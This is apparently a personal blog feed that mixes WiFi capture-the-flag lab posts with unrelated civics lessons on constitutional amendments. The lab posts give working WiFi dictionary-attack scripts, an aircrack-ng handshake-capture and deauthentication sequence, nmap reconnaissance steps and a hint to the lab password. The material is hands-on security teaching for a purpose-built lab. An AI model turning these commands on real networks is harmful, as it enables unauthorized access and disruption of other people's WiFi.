You Cracked the WiFi Password – Now What?

A beginner’s guide to network reconnaissance after gaining WiFi access to the ctf-lab wifi network!

Engage: Celebrate Your First Win

You did it. You captured that WPA2 handshake, ran it through your wordlist, and now you’re connected to the target network. Maybe you brute forced the password. Maybe you social engineered it! That rush you’re feeling? That’s the satisfaction of your first real hack.

But here’s the thing: cracking the WiFi password was just picking the lock on the front door. You’re standing in the lobby now. The real exploration begins here.

So what’s next?

Explore: Understanding Your Position

Before you start poking around, you need to understand where you are on this network. Your device just received some critical information when it connected.

Find Your IP Address

Your IP address is your identity on this network. Find it:

iPhone/iPad: Settings → Wi-Fi → tap the network name → look for “IP Address”
Android: Settings → Network & Internet → Wi-Fi → tap the gear icon → IP address
Mac: System Preferences → Network → Wi-Fi → look for IP Address
Windows: Open Command Prompt, type ipconfig
Linux: Open terminal, type ip addr or hostname -I

You’ll see something like 192.168.4.47. Write this down.

Find the Default Gateway

The default gateway is even more interesting. This is the network’s router – the device that controls traffic flow and often hosts services. It’s typically the first target worth investigating.

Find it in the same location as your IP address. On this network, it’s likely 192.168.4.1.

Why does this matter? The gateway is almost always running something. Web interfaces. Admin panels. Sometimes vulnerable services that were never meant to be exposed.

Explain: What Can You Do With This Information?

You now know two things:

Your address on the network (your IP)
The “center” of the network (the gateway)

But networks aren’t just two devices. There could be servers, other users, printers, IoT devices, cameras – all potential targets. How do you find them?

Network scanning.

A network scanner sends packets to IP addresses and ports, listening for responses. When something responds, you’ve discovered a live host. When you probe its ports, you discover what services it’s running.

Think of it like this: your IP tells you what apartment building you’re in. Scanning tells you which apartments have their lights on and what’s happening inside.

The Scan Strategy

Host discovery – Find all live devices on the network (typically 192.168.4.1-254)
Port scanning – For each live host, discover which ports are open
Service identification – Determine what’s running on those ports

Common ports to watch for:

22 – SSH (remote shell access)
80/443 – Web servers
21 – FTP (file transfer)
3306 – MySQL database
5000-5002 – Often custom web applications

Elaborate: Tools for Network Discovery

Mobile Apps (Great for Learning)

iOS:

Fing – Excellent free network scanner, shows all devices and open ports
iNet – Network scanner with port detection
Network Analyzer – Comprehensive tool with ping, traceroute, and port scanning

Android:

Fing – Same great tool, available on Android
Net Analyzer – Free network discovery and diagnostics
PortDroid – Dedicated port scanner

Command Line (More Powerful)

Nmap is the gold standard. Install it on any laptop:

# Discover all hosts on the network
nmap -sn 192.168.4.0/24

# Scan common ports on the gateway
nmap 192.168.4.1

# Aggressive scan with service detection
nmap -sV -sC 192.168.4.1

Netcat for quick port checks:

nc -zv 192.168.4.1 80
nc -zv 192.168.4.1 22

Evaluate: Your Reconnaissance Checklist

Before moving to exploitation, confirm you’ve gathered:

[ ] Your assigned IP address
[ ] The default gateway IP
[ ] List of all live hosts on the network
[ ] Open ports on each discovered host
[ ] Services identified on interesting ports
[ ] Any web interfaces found (try opening IPs in your browser!)

Pro tip: Open your browser and navigate directly to the gateway IP. Then try adding port numbers: http://192.168.4.1:5000, http://192.168.4.1:5002. Web applications often hide on non-standard ports.

What’s Next?

You’ve mapped the terrain. You know what’s out there. Now the real challenges begin:

Can you find hidden web pages?
Are there login forms you can test?
What happens if you try default credentials?
Are there services running that shouldn’t be exposed?

Every open port is a potential entry point. Every web form is a potential vulnerability.

Your reconnaissance is complete. Time to start probing.

Remember: Only practice these techniques on networks you own or have explicit permission to test. Happy hacking.

November 28, 2025

WiFi Security Puzzle + Free CTF Tomorrow!

Ever noticed that on some WiFi networks, you can scan and see every connected device. On others, you can only see the access point.

Why the difference? It’s because of a wifi feature called Client Isolation (aka AP Isolation).

When Client Isolation is enabled, WiFi clients are prevented from talking directly to each other. Every packet must go through the gateway first. It’s like putting each guest in their own private hallway to the router.

Security benefits of Client Isolation include:

Client Isolation stops attackers from scanning other devices on the network
C.I. prevents lateral movement between WiFi clients
C.I. Blocks ARP spoofing and MITM attacks at Layer 2

Coffee shops and hotels should enable Client Isolation. Many don’t. 👀

Why this matters for my CTF:
When you join a hacking competition, everyone’s running offensive tools—port scanners, exploit frameworks, packet sniffers. Without client isolation, participants could accidentally (or intentionally) target each other instead of the challenge.

My WiFi CTF enables client isolation so participants can focus on hacking the intended target, not each other’s laptops. You can run Nmap all day and you’ll only see the CTF server, not your neighbor’s MacBook.

Want to learn more hands-on?

Join me tomorrow (Saturday) for a free WiFi CTF at Big Block Brewery in Carnation, WA from 1-4 PM. We’ll explore WiFi security, network reconnaissance, and capture-the-flag challenges on a purpose-built vulnerable network—safely isolated from each other.

🍺 Location: https://www.bigblockbrewery.com/carnation-taproom
📝 Sign up: https://wifictf.patrickmccanna.net

Bring a laptop. Grab a beer. Hack some things (legally and safely).

#cybersecurity #wifi #ctf #infosec #networking #seattle

November 25, 2025November 6, 2025

Day 28: Major Amendments After the Bill of Rights

Engage: The Constitution’s Second Founding

The Constitution was signed in 1787. But in many ways, the Constitution we live under today was created in the 1860s.

The 13th, 14th, and 15th Amendments—the Reconstruction Amendments—fundamentally transformed America’s constitutional order. They ended slavery, redefined citizenship, required equal protection, and prohibited racial discrimination in voting. Together, they constituted a second founding, correcting the original Constitution’s greatest failure.

Beyond these three, seventeen more amendments have shaped American government and society. Some expanded democracy. Some limited government. One prohibited alcohol; another repealed that prohibition. Each tells a story about America’s ongoing struggle to form “a more perfect union.”

Explore: The Reconstruction Amendments (13-15)

Thirteenth Amendment (1865): “Neither slavery nor involuntary servitude, except as a punishment for crime whereof the party shall have been duly convicted, shall exist within the United States, or any place subject to their jurisdiction.”

Abolished slavery and involuntary servitude
Passed after Civil War while Southern states couldn’t object
Note the exception: prisoners can still be forced to work
Required for Southern states’ readmission to Union

Fourteenth Amendment (1868): The longest and most litigated amendment, containing multiple clauses:

Citizenship Clause: “All persons born or naturalized in the United States, and subject to the jurisdiction thereof, are citizens of the United States and of the State wherein they reside.”

Overruled Dred Scott v. Sandford (which said African Americans couldn’t be citizens)
Established birthright citizenship

Privileges or Immunities Clause: “No State shall make or enforce any law which shall abridge the privileges or immunities of citizens of the United States”

Largely gutted by Slaughterhouse Cases (1873)
Could have protected civil rights; courts chose not to use it that way

Due Process Clause: “nor shall any State deprive any person of life, liberty, or property, without due process of law”

Applied Bill of Rights to states (“incorporation”)
Source of “substantive due process” protecting unenumerated rights
Most important clause in modern constitutional law

Equal Protection Clause: “nor deny to any person within its jurisdiction the equal protection of the laws”

Prohibits state discrimination
Used to end segregation (Brown v. Board)
Extends to sex, national origin, other classifications

Fifteenth Amendment (1870): “The right of citizens of the United States to vote shall not be denied or abridged by the United States or by any State on account of race, color, or previous condition of servitude.”

Prohibited racial discrimination in voting
States evaded through literacy tests, poll taxes, grandfather clauses, violence
Not effectively enforced until Voting Rights Act of 1965

Explain: Progressive Era Reforms (16-19)

Sixteenth Amendment (1913): Authorized federal income tax

Overruled Pollock v. Farmers’ Loan & Trust Co. (1895)
Fundamentally changed federal power—government no longer dependent on tariffs and excise taxes
Enabled modern welfare state and massive federal government

Seventeenth Amendment (1913): Direct election of senators

Previously chosen by state legislatures
Responded to corruption, deadlocks, and democratic pressure
Reduced states’ role in federal government
Made Senate more responsive to popular opinion (for better or worse)

Eighteenth Amendment (1919): Prohibited alcohol

Only amendment later fully repealed
Led to organized crime, speakeasies, and widespread disrespect for law
Lesson: can’t legislate morality through Constitution

Nineteenth Amendment (1920): Women’s suffrage

“The right of citizens of the United States to vote shall not be denied or abridged by the United States or by any State on account of sex”
Culmination of decades of activism
Doubled the electorate overnight
Some states allowed women to vote earlier; others resisted after

Elaborate: Modern Amendments (20-27)

Twentieth Amendment (1933): “Lame Duck Amendment”

Moved presidential inauguration from March to January
Shortened time outgoing officials serve after losing election
Responded to long gap during Great Depression

Twenty-First Amendment (1933): Repealed Prohibition

Only amendment to repeal another amendment
Only amendment ratified by state conventions (not legislatures)
Demonstrated that constitutional mistakes can be corrected

Twenty-Second Amendment (1951): Presidential term limits

Limited presidents to two terms (or 10 years total)
Response to FDR’s four terms
Prevents accumulation of excessive executive power
But removes experienced leaders and makes presidents “lame ducks”

Twenty-Third Amendment (1961): DC electoral votes

Gave Washington, DC electoral votes for president (currently 3)
DC still lacks full congressional representation
Attempt to give DC statehood has repeatedly failed

Twenty-Fourth Amendment (1964): Banned poll taxes

States charged fees to vote, preventing poor people (especially Black citizens) from voting
Part of broader civil rights movement

Twenty-Fifth Amendment (1967): Presidential succession and disability

Clarified what happens if president becomes incapacitated
Created procedures for temporary transfer of power
Established process for filling vice-presidential vacancies
Invoked when Reagan was shot, when Bush had colonoscopy, when Trump had COVID

Twenty-Sixth Amendment (1971): Voting age lowered to 18

“Old enough to fight, old enough to vote”
Response to Vietnam War draft
Fastest ratification: 100 days

Twenty-Seventh Amendment (1992): Congressional pay raises

Pay raises can’t take effect until after next election
Originally proposed by James Madison in 1789!
Ratified 202 years later after student’s paper arguing it was still viable
Shows amendment process never truly “expires”

Evaluate: Themes and Patterns

Looking at all 27 amendments, several patterns emerge:

Expanding Democracy:

15th, 19th, 24th, 26th: Expanded who can vote
17th: Made Senate elected by people
23rd: Gave DC electoral votes

Limiting Government:

1st-10th: Bill of Rights
13th, 14th: Limited state power over individuals
16th: Enabled more government (income tax)

Fixing Structural Problems:

11th: Sovereign immunity for states
12th: Electoral College procedures
20th: Lame duck period
22nd: Presidential term limits
25th: Presidential succession

Correcting Mistakes:

21st: Repealed 18th (Prohibition)

Protecting Civil Rights:

13th, 14th, 15th: Reconstruction Amendments
19th, 24th, 26th: Voting rights

The Lesson:
The Constitution can change. It has changed. But change requires overwhelming consensus across decades. The amendment process filters out temporary passions while allowing genuine, lasting reforms.

No amendments have passed since 1992. Does this mean the Constitution is complete? Or that we’re stuck with an 18th-century framework unable to address 21st-century problems? That debate continues.

Key Vocabulary

Reconstruction Amendments: 13th, 14th, 15th—passed after Civil War
Incorporation: Application of Bill of Rights to states via 14th Amendment
Equal Protection: Guarantee that government won’t discriminate (14th Amendment)
Due Process: Government must follow fair procedures (5th and 14th Amendments)
Suffrage: Right to vote

Think About It

If you could add one amendment to the Constitution today, what would it be? Why do you think it would receive the necessary 2/3 and 3/4 support? What opposition would it face?

Additional Resources

Primary Source: Read all 27 Amendments:
https://www.archives.gov/founding-docs/amendments-11-27

Notice how different they are in purpose, length, and scope. The 14th Amendment alone has generated more litigation than most of the original Constitution.

For the Reconstruction Amendments’ history and meaning, read the National Archives educational materials:
https://www.archives.gov/milestone-documents

For the 14th Amendment’s transformative effect, read Brown v. Board of Education (1954):
https://www.archives.gov/milestone-documents/brown-v-board-of-education

This decision used the Equal Protection Clause to end legal segregation, demonstrating how amendments can fundamentally reshape American society—sometimes decades or centuries after ratification.

This concludes Week 4 and our study of the Constitution itself. Next week, we’ll begin exploring the three branches in detail, starting with Congress—how it actually functions, how laws are made, and how representatives balance competing pressures.

November 24, 2025November 6, 2025

Day 27: The Amendment Process – How to Change the Constitution

Engage: Designed to Be Difficult

The Constitution has been amended only 27 times in 235+ years. Thousands of amendments have been proposed; only a tiny fraction succeeded. By comparison, state constitutions are amended constantly—some have hundreds of amendments.

This wasn’t an accident. The framers made the amendment process difficult on purpose. They wanted the Constitution to be stable, not subject to every passing passion. But they also wanted it changeable—unlike the Articles of Confederation, which required unanimous consent and proved impossible to amend.

Article V creates a process that’s demanding but not impossible—threading the needle between flexibility and stability.

Explore: Two Steps, Multiple Paths

Article V requires two steps: Proposal and Ratification. Each step has two possible paths:

Step 1 – Proposal (two methods):

Congressional Proposal: 2/3 vote in both House and Senate

Used for all 27 existing amendments
Congress proposes, doesn’t ratify

Constitutional Convention: Called by Congress when 2/3 of state legislatures request it

Never used
Many states have applied; never reached 2/3 threshold
Raises questions: What would convention’s scope be? Could it rewrite the entire Constitution?

Step 2 – Ratification (two methods):

State Legislatures: 3/4 of state legislatures must approve

Used for 26 of 27 amendments
Currently means 38 of 50 states

State Conventions: 3/4 of special state conventions must approve

Used only for 21st Amendment (repealing Prohibition)
Bypasses state legislatures when they might oppose popular sentiment

Important: The President has no role in amendments. This is purely a congressional and state process.

Explain: Why So Difficult?

The framers studied failed republics. They saw two dangers:

Too Easy to Amend: Constitution becomes unstable, subject to temporary passions, manipulated by factions, loses authority.

Too Hard to Amend: Constitution becomes obsolete, can’t adapt to changing circumstances, eventually collapses or is overthrown.

The Articles of Confederation required unanimous state consent for amendments. Result: couldn’t be amended at all. When change was needed, the entire system was replaced.

The Constitution requires substantial supermajorities (2/3 and 3/4) but not unanimity. This ensures amendments have broad, lasting support across different regions and political divisions.

James Madison in Federalist No. 43 explained: The process “guards equally against that extreme facility, which would render the Constitution too mutable; and that extreme difficulty, which might perpetuate its discovered faults.”

Elaborate: The Amendments That Succeeded

The Bill of Rights (1-10, 1791):
Proposed by the First Congress to fulfill ratification promises. All ten were proposed and ratified together.

Post-Civil War Amendments (13-15, 1865-1870):

13th: Abolished slavery
14th: Citizenship, equal protection, due process
15th: Voting rights regardless of race
Required as part of Southern states’ re-admission to Union after Civil War.

Progressive Era Amendments (16-19, 1909-1920):

16th: Federal income tax
17th: Direct election of senators (previously chosen by state legislatures)
18th: Prohibition of alcohol
19th: Women’s suffrage
Era of reform; amendments reflected changing social values.

Modern Amendments (20-27, 1933-1992):

20th: Changed presidential inauguration date
21st: Repealed Prohibition (only amendment to repeal another)
22nd: Presidential term limits (response to FDR’s four terms)
23rd: DC electoral votes
24th: Banned poll taxes
25th: Presidential succession procedures
26th: Voting age lowered to 18 (response to Vietnam draft)
27th: Congressional pay raises (proposed 1789, ratified 1992!)

Evaluate: Amendments That Failed

Thousands of amendments have been proposed. Most die in committee. Some came close:

Equal Rights Amendment (1972):
“Equality of rights under the law shall not be denied or abridged by the United States or by any State on account of sex.”

Passed Congress easily. Ratified by 35 states—just 3 short of the 38 needed. Deadline expired in 1982. Some states ratified afterward, leading to ongoing legal debate about whether it’s still viable.

Balanced Budget Amendment:
Would require federal government to balance its budget except in emergencies. Proposed multiple times; never passed Congress.

District of Columbia Voting Rights Amendment (1978):
Would give DC full congressional representation. Passed Congress; only 16 states ratified. Expired in 1985.

Flag Desecration Amendment:
Would allow Congress to ban flag burning. Came within one vote of passing Senate multiple times. Raises First Amendment concerns.

Failed Historical Proposals:

Eliminating Electoral College (proposed many times)
Limiting federal spending or taxation
School prayer
Prohibition on same-sex marriage
Balanced budget
Campaign finance reform
Line-item veto for President

Evaluate: Too Hard or Just Right?

Arguments the Process Is Too Difficult:

Constitution enshrines outdated provisions (Electoral College, Senate representation)
Small states representing minority of population can block needed changes
Modern problems (climate change, digital privacy, campaign finance) need constitutional solutions
Other democracies amend their constitutions more easily and survive

Arguments the Process Is Appropriately Difficult:

Stability is valuable; rule of law requires enduring framework
Difficult amendments ensure broad consensus
Easy amendments would lead to constitutional chaos
Other countries’ constitutions are weaker precisely because they’re easily changed
Many issues can be addressed through legislation or interpretation, not amendment

Alternative to Amendment—Constitutional Interpretation:
Because formal amendment is so difficult, the Constitution evolves primarily through interpretation:

Judicial decisions expand or contract constitutional meaning
Congressional statutes fill in details
Executive practices establish precedents
Social movements change how rights are understood

Is this legitimate? Or does it bypass the amendment process the framers carefully designed?

The Unresolved Tension:
The Constitution is simultaneously:

The supreme law—above normal politics
A living document—evolving with society

How do we balance these? Too much change undermines stability. Too little change makes the Constitution irrelevant. Article V tries to thread this needle, but reasonable people disagree on whether it succeeds.

Key Vocabulary

Amendment: Formal change to the Constitution
Proposal: First step—amendment suggested (requires 2/3)
Ratification: Second step—amendment approved (requires 3/4)
Article V: Constitutional provision establishing amendment process
Supermajority: More than simple majority (50%+1); amendments require 2/3 and 3/4

Think About It

If you could make the amendment process easier (simple majority? 60%?) or harder (unanimous consent?), would you? What would be the consequences of your choice?

Additional Resources

Primary Source: Read Article V of the Constitution:
https://www.archives.gov/founding-docs/constitution-transcript

Notice the careful balance: multiple paths to proposal and ratification, but all requiring supermajorities.

Read Federalist No. 43 by James Madison explaining Article V:
https://avalon.law.yale.edu/18th_century/fed43.asp

Madison addresses the Anti-Federalist criticism that the amendment process is too difficult, arguing it appropriately balances “that extreme facility… and that extreme difficulty.”

See the full list of proposed constitutional amendments:
https://www.congress.gov/search?q=%7B%22source%22%3A%22legislation%22%2C%22search%22%3A%22proposing+an+amendment%22%7D

Thousands have been proposed. The vast majority never leave committee.

Tomorrow: We’ll explore the major amendments after the Bill of Rights—how the Constitution has evolved through crisis and reform.

November 24, 2025

WiFi Password Cracking Challenge

In this lab, you will learn how to brute force the WiFi credentials of the CTF_LAB access point. This is the first challenge in the WiFi CTF competition and teaches fundamental concepts of password security and dictionary attacks.

Challenge Objectives:

[ ] Find the wifi network
[ ] Manually guess some passwords
[ ] Find a dictionary
[ ] Find a command to use to connect to wifi networks
[ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
[ ] Launch the attack and discover the credential

BEFORE YOU START

Prerequisites:

The CTF Lab Raspberry Pi must be powered on and running
The WiFi Access Point should be broadcasting (wait ~1-2 minutes after power-on)
You should have a laptop or mobile device capable of WiFi scanning
IMPORTANT: DO NOT PERFORM THIS WORK ON A CORPORATE OR MANAGED LAPTOP. Use a personal computer you own, as security/IT teams may flag hacking tools as malicious software

What You’ll Learn:

WiFi network reconnaissance
Password dictionary attacks
Command-line automation with loops
The importance of strong passwords

Discovering the WiFi Network

The Raspberry Pi CTF Lab operates as a WiFi access point that you can practice ethical hacking against. About 1-2 minutes after it is powered on, it will broadcast a WiFi network with the SSID (network name):

CTF_LAB

Finding the Network

You can discover this network from any WiFi-capable device:

On Mobile Devices (iOS/Android):

Open Settings → WiFi
Look for the network named CTF_LAB in the available networks list

On Mac:

Click the WiFi icon in the menu bar
Look for CTF_LAB in the network list

On Linux:

# Scan for available networks
nmcli device wifi list

# Or use iwlist
sudo iwlist wlan0 scan | grep -i "ctf_lab"

On Windows:

Click the WiFi icon in the system tray
Look for CTF_LAB in the available networks

Progress:

[x] Find the wifi network
[ ] Manually guess some passwords
[ ] Find a dictionary
[ ] Find a command to use to connect to wifi networks
[ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
[ ] Launch the attack and discover the credential

Manually Guessing a Password

Now that you’ve found the CTF_LAB network, you can try connecting with some common passwords. Try a few guesses manually:

password
12345678
admin
ctf
supervisor

Unless you’re very lucky (or very strategic), you probably won’t guess it immediately. This demonstrates an important security principle: password strength matters.

Why Dictionary Attacks Work

You might wonder why manual guessing is ineffective, but a dictionary attack can succeed. Here’s the key insight:

Password Space vs. Memorable Passwords

Total possible passwords: With lowercase letters, uppercase, numbers, and symbols, an 8-character password has over 200 trillion possible combinations
Memorable passwords: Most people choose passwords they can remember, which drastically reduces the search space to maybe a few million common choices

Since humans tend to use memorable passwords (dictionary words, names, common phrases), attackers can:

Start with a list of commonly used passwords
Try these first before resorting to true brute force
Often succeed without testing billions of random combinations

This is why password managers and randomly generated passwords are so important for real security!

Progress:

[x] Find the wifi network
[x] Manually guess some passwords
[ ] Find a dictionary
[ ] Find a command to use to connect to wifi networks
[ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
[ ] Launch the attack and discover the credential

Finding a Dictionary

Let’s try to find a common password list. You can do this by searching google for the following phrase:

“10k most common passwords”

you should see a link to a github repository show up that’s at the following url:

https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt

Browse to the page. Click on the button labeled “raw” on the right side of the page. You can then save this file to your computer by clicking on the file menu for the browser and selecting “save as.”

When you click on Save as, a dialog will show up:

You’ll need to create a directory for starting our hacking. You can do this from within the dialog by clicking on New Folder. Name it HackingLab and click Create.

Then go ahead and click on save. You’ll now have a file called “10k-most-common.txt” in the Hacking lab direcotry. Let’s learn to view the file from the command line. Let’s use spotlight to open up the terminal by hitting command and space simultaneously, and then typing in terminal:

Change into your HackingLab directory by typing the following:

cd HackingLab Now that you’re in the HackingLab directory, let’s view the password file:

more 10k-most-common.txt

You’ll see that each row of the file contains a password.

Hit q to leave the more command.

Progress:

[x] Find the wifi network
[x] Manually guess some passwords
[x] Find a dictionary
[ ] Find a command to use to connect to wifi networks
[ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
[ ] Launch the attack and discover the credential

Finding a Command to Connect to WiFi Networks

Now we have a password list – we need to figure out how to automate connection attempts. The approach varies by operating system:

Mac OS

Search Google for “Connect to wifi from command line mac” to find resources. Here are the key commands:

Scan for networks:

/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s

Connect to a network:

networksetup -setairportnetwork en0 <SSID_OF_NETWORK> <PASSWORD>

Try running the airport -s command to see available networks. You should see CTF_LAB in the list.

Testing a single password:

networksetup -setairportnetwork en0 CTF_LAB somepassword

When you run this, your WiFi will disconnect temporarily. If the password is wrong, you’ll see an error message.

Linux

Using nmcli (NetworkManager):

# Scan for networks
nmcli device wifi list

# Connect to network
nmcli device wifi connect CTF_LAB password somepassword

Using wpa_supplicant (manual):

# Create config
wpa_passphrase CTF_LAB somepassword > /tmp/wpa.conf

# Connect
sudo wpa_supplicant -B -i wlan0 -c /tmp/wpa.conf

Windows (PowerShell)

# View available networks
netsh wlan show networks

# Connect to network
netsh wlan connect name="CTF_LAB"

For automated password testing on Windows, you’ll need to create a WiFi profile XML file for each password attempt, which is more complex than on Mac/Linux.

Progress:

[x] Find the wifi network
[x] Manually guess some passwords
[x] Find a dictionary
[x] Find a command to use to connect to wifi networks
[ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
[ ] Launch the attack and discover the credential

Automating the Dictionary Attack

Now for the exciting part – we’ll automate the password testing using a loop that tries each password from our dictionary file!

Mac OS Script

At the terminal, type the following lines and hit Enter at the end of each line:

while read passwordfilevalue; do
  networksetup -setairportnetwork en0 CTF_LAB "$passwordfilevalue"
  ifconfig en0 | grep inet
  echo "Tried password: $passwordfilevalue"
done < 10k-most-common.txt

What this script does:

Command	Purpose
`while read passwordfilevalue; do`	Creates a loop that reads the password list one row at a time
`networksetup -setairportnetwork en0 CTF_LAB "$passwordfilevalue"`	Attempts to connect to CTF_LAB using the current password
`ifconfig en0	grep inet`
`echo "Tried password: $passwordfilevalue"`	Prints the password we just tried
`done < 10k-most-common.txt`	Reads from the password dictionary file

How to detect success:

When you see an inet line with an IP address (like inet 192.168.4.100), you’ve connected successfully!
The password printed immediately before the IP address is the correct one
The CTF_LAB network uses the 192.168.4.0/24 subnet, so successful connections will show an IP like 192.168.4.X

Linux Script

while read passwordfilevalue; do
  nmcli device wifi connect CTF_LAB password "$passwordfilevalue" 2>&1
  if [ $? -eq 0 ]; then
    echo "SUCCESS! Password found: $passwordfilevalue"
    break
  else
    echo "Failed password: $passwordfilevalue"
  fi
done < 10k-most-common.txt

Advanced: Using Aircrack-ng Suite (Linux)

For a more sophisticated approach, you can capture the WPA2 handshake and crack it offline:

# 1. Put WiFi adapter in monitor mode
sudo airmon-ng start wlan0

# 2. Scan for networks
sudo airodump-ng wlan0mon

# 3. Capture handshake (note the channel and BSSID of CTF_LAB)
sudo airodump-ng -c <channel> --bssid <BSSID> -w ctf_capture wlan0mon

# 4. In another terminal, deauth a client to force handshake
sudo aireplay-ng -0 1 -a <BSSID> wlan0mon

# 5. Once handshake is captured, crack it
aircrack-ng -w 10k-most-common.txt ctf_capture-01.cap

Progress:

[x] Find the wifi network
[x] Manually guess some passwords
[x] Find a dictionary
[x] Find a command to use to connect to wifi networks
[x] Figure out how to push the passwords from the dictionary file into the wifi connection command
[x] Launch the attack and discover the credential

What You Should See

As the script runs, you’ll see:

Each password being tried
Connection errors for wrong passwords
When successful: An IP address in the 192.168.4.X range appears!

The password is somewhere in that 10k common password list. Watch the output carefully to catch the successful connection.

Hint: Think about common passwords related to oversight, management, or authority. The CTF_LAB password is a common English word.

Next Steps

Once you’ve successfully connected to the CTF_LAB WiFi network, you’re ready to:

Scan the network to find a registration resource
Register
Access the dashboard
Begin exploring the web services and system challenges
Start earning points!

Congratulations on completing your first challenge! You’ve learned:

WiFi reconnaissance techniques
The power of dictionary attacks
Why password strength matters
Basic bash scripting for automation

November 19, 2025

Hands-On WiFi Security CTF: Beta Test Experience

Where are you in your security journey? Let’s find out together.

I’m inviting you to beta test my new WiFi security CTF — a deliberately vulnerable Raspberry Pi network that gives you a safe space to truly test what you know, discover what you’re capable of, and chart your path forward.

Visit https://wifictf.patrickmccanna.net to learn more and sign up.

If you’re on the fence about attending- here’s a summary of what you can expect to experience. Be sure to signup, then show up to Big Block Brewery in Carnation WA on Sat. Nov 29th between 1-4 pm.

Show up with your laptop or phone- and search for the wifi network:

The Challenge

A password-protected WiFi network called “CTF_LAB” is your starting point. Your mission:

Gain access to the WiFi network — apply wireless exploitation techniques
Enumerate and understand the network — map what’s running and where
Identify and exploit vulnerabilities — put your knowledge into practice
Achieve persistent root access — prove you can chain exploits effectively
Earn points for successful exploitation — not just for finding things, but for making them work

This lab rewards execution. You get points when your exploits actually work — because that’s what matters in the real world.

Why This Lab Exists

You deserve to know what you’re actually capable of. Not what you think you can do, or what you’ve read about — what you can execute when it counts. This lab gives you that clarity.

Growth happens at the edge of your abilities. This CTF is designed to meet you wherever you are: if you’re just starting out, you’ll learn foundational techniques. If you’re experienced, you’ll get to validate your skills and find the gaps you didn’t know existed. Both are valuable.

Real scenarios build real skills. The vulnerabilities here mirror actual IoT security assessments. The techniques that work here will serve you in professional security work, research, or wherever your curiosity takes you.

Your Experience

You’ll begin outside the network. Getting in might mean capturing and cracking a WPA handshake, or it might mean taking the shortcut and focusing on what comes next — it’s your call.

Once you’re on the network, the real exploration begins. What’s running? Where? How can these services be leveraged? Each vulnerability you discover and exploit opens doors to the next challenge.

This is where you’ll learn the most about yourself. Can you enumerate effectively? Do you recognize exploitation opportunities when you see them? Can you chain attacks together? These aren’t just technical questions — they’re diagnostic. The answers tell you exactly what to learn next.

Hit a wall? The lab includes embedded educational guides that explain concepts and techniques without robbing you of the “aha!” moment. You’ll still need to apply what you learn — because that’s where growth happens. And I’m here if you need a nudge in the right direction.

Who This Is For

This lab is for anyone who’s serious about understanding their own capabilities:

Learners who are ready to find out if they can actually do what they’ve been studying
Practitioners who want an honest assessment of where they stand
The curious who wonder if they’re as capable as they hope they are
The ambitious who want to identify what to master next

What You’ll Discover

Every person who takes on this challenge learns something different:

You might discover you’re further along than you thought
You might find unexpected strengths in areas you hadn’t focused on
You might identify specific gaps that, once filled, will level up your entire skillset
You might surprise yourself with what you can figure out when the pressure is on

All of these outcomes are wins. Knowing where you stand is the foundation for getting where you want to go.

Begin Your Assessment

The beta test is live. Bring your laptop, your curiosity, and your willingness to be honest with yourself about what you know.

Starting your security journey? This lab will show you what’s possible and give you a clear path forward.

Already experienced? This is your chance to validate your skills against realistic scenarios and find your next growth edge.

Visit wifictf.patrickmccanna.net to participate.

I’m excited to see what you discover!

November 19, 2025November 6, 2025

Day 24: Amendments 2-4 – Security and Privacy

Engage: The Right to Be Left Alone

The first Americans experienced British soldiers searching homes without warrants, seizing weapons, and forcing families to house troops in their own homes. These weren’t abstract tyrannies—they were daily humiliations. So the Bill of Rights protected what we now call privacy and security. Three amendments address these: one about weapons, one about soldiers, and one about searches.

They’re among the most controversial amendments today, but their historical purpose was clear: prevent government from invading the private sphere.

Explore: Three Amendments, Three Protections

Second Amendment: “A well regulated Militia, being necessary to the security of a free State, the right of the people to keep and bear Arms, shall not be infringed.”

Third Amendment: “No Soldier shall, in time of peace be quartered in any house, without the consent of the Owner, nor in time of war, but in a manner to be prescribed by law.”

Fourth Amendment: “The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized.”

Explain: The Historical Context

Second Amendment – The Battle of Lexington and Concord:
On April 19, 1775, British troops marched to Concord to seize colonial weapons and ammunition. Minutemen assembled to resist. The shots fired that day started the Revolutionary War. The experience taught colonists that an armed citizenry could resist tyranny.

But what did “militia” mean? In 1791, it meant all able-bodied men who could be called to defend their community. There was no standing army—citizen-soldiers provided defense. The amendment protected this system.

Modern Debate:
The Second Amendment is perhaps the most contentious in the Bill of Rights:

Individual Right View: The amendment protects an individual’s right to own firearms, period. The militia clause explains why (self-defense and resistance to tyranny), but doesn’t limit the right. Supported by District of Columbia v. Heller (2008).

Collective Right View: The amendment protects the right to maintain militias (National Guard), not individual gun ownership. The “well regulated Militia” clause is the operative part. This was the dominant interpretation until Heller.

Modern questions: Can government ban certain weapons (machine guns, AR-15s)? Require background checks? Prevent felons or mentally ill from owning guns? Red flag laws? The Second Amendment says “shall not be infringed,” but even Heller acknowledged some regulations are constitutional.

Third Amendment – The Quartering Act:
In the 1760s-70s, Britain passed Quartering Acts requiring colonists to house British soldiers. Imagine strangers with guns moving into your home, eating your food, and you can’t refuse. The Declaration of Independence lists this grievance.

Modern Relevance:
The Third Amendment is the least litigated—government doesn’t try to quarter soldiers. But it establishes a principle: your home is your castle. Government can’t commandeer private property for its convenience. Some legal scholars cite it as part of broader “privacy” rights not explicitly enumerated.

Fourth Amendment – Writs of Assistance:
British authorities used “writs of assistance“—general warrants allowing soldiers to search any home, any time, for smuggled goods. No specific probable cause needed. James Otis challenged these in 1761, calling them “the worst instrument of arbitrary power.” He lost, but his argument influenced the framers.

Modern Application:
The Fourth Amendment requires:

Probable cause: Specific reason to believe a crime occurred
Warrant: Issued by neutral judge, not police
Particularity: Warrant must specify what to search and seize
Reasonableness: Even with warrant, search must be reasonable

Elaborate: The Fourth Amendment in the Modern World

The Fourth Amendment was written for physical searches of physical things. What about:

Cars: Police need warrants to search homes, but cars are mobile. Courts created “automobile exception”—less protection.

Digital Data: Police obtained a warrant for your phone. Can they search everything on it? Text messages? Email? Cloud data? GPS history? Riley v. California (2014) required warrants for cell phone searches.

Surveillance: Does the Fourth Amendment protect against:

Wiretaps (yes, since Katz v. United States, 1967)
